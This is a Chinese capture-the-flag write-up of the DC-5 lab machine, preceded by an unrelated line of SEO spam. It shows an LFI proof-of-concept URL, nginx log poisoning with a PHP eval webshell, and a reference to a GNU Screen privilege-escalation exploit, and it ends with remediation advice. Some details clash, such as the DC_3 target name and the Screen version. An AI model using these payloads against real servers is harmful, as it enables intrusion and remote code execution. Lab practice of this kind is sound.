网站运营管理教材,网站搬家,花都网站制作公司,合肥市有做网站的公司吗DC-5渗透测试复现
目的#xff1a;
获取最高权限以及5个flag
过程#xff1a;
信息打点-文件包含漏洞-弹shell- scren-4.0.5提权
环境#xff1a;
攻击机#xff1a;kali(192.168.85.136)
靶机#xff1a;DC_3(192.168.85.134)
复现#xff1a;
一.信息收集 nma…DC-5渗透测试复现
目的
获取最高权限以及5个flag
过程
信息打点-文件包含漏洞-弹shell- scren-4.0.5提权
环境
攻击机kali(192.168.85.136)
靶机DC_3(192.168.85.134)
复现
一.信息收集 nmap -sP 192.168.85.0/24 或者 arp-scan -l 扫描端口 awvs扫描 网站框架查看 二.寻找漏洞
footer.php每一刷一次那个时间就会变 thankyou.php目录下发现存在footer.php的信息 有可能存在文件包含 POC:
http://192.168.85.134/thankyou.php?file/etc/passwd
三. 漏洞利用
利用错误日志的方法上传webshell进行连接
http://192.168.85.134/thankyou.php?wenda?php eval($_POST[wenda]);?
这里的传参wenda是没有的 就是要构造错误的代码这样网站的日志就能记录然后需要抓包发送 因为一些编码会被浏览器自动转为url ,所以还得自己修改回去上传成功后 我们需要得到路径也就是webshell存在日志里 但日志路径是什么
网站日志 /var/log/nginx/error.log
http://192.168.85.134/thankyou.php?file/var/log/nginx/error.log 那地址就是这个了 连接一键了 然后为了方便弹shell 发现scren-4.0.5提权 四.scren-4.0.5提权
这个方法有很多 网上一搜就有很多利用方法 唯一注意点就是GCC版本 版本过高后边利用有点问题
exp:可以参考
GNU Screen 4.5.0 - Local Privilege Escalation - Linux local Exploit (exploit-db.com)
kali漏洞库也自带这个漏洞 得到flag 修复 1.关闭111危险端口 2.过滤../ ./ 配置php.ini文件 都关闭allow_url_fopen 和 allow_url_include 设置白名单 3.关闭某些危险提权函数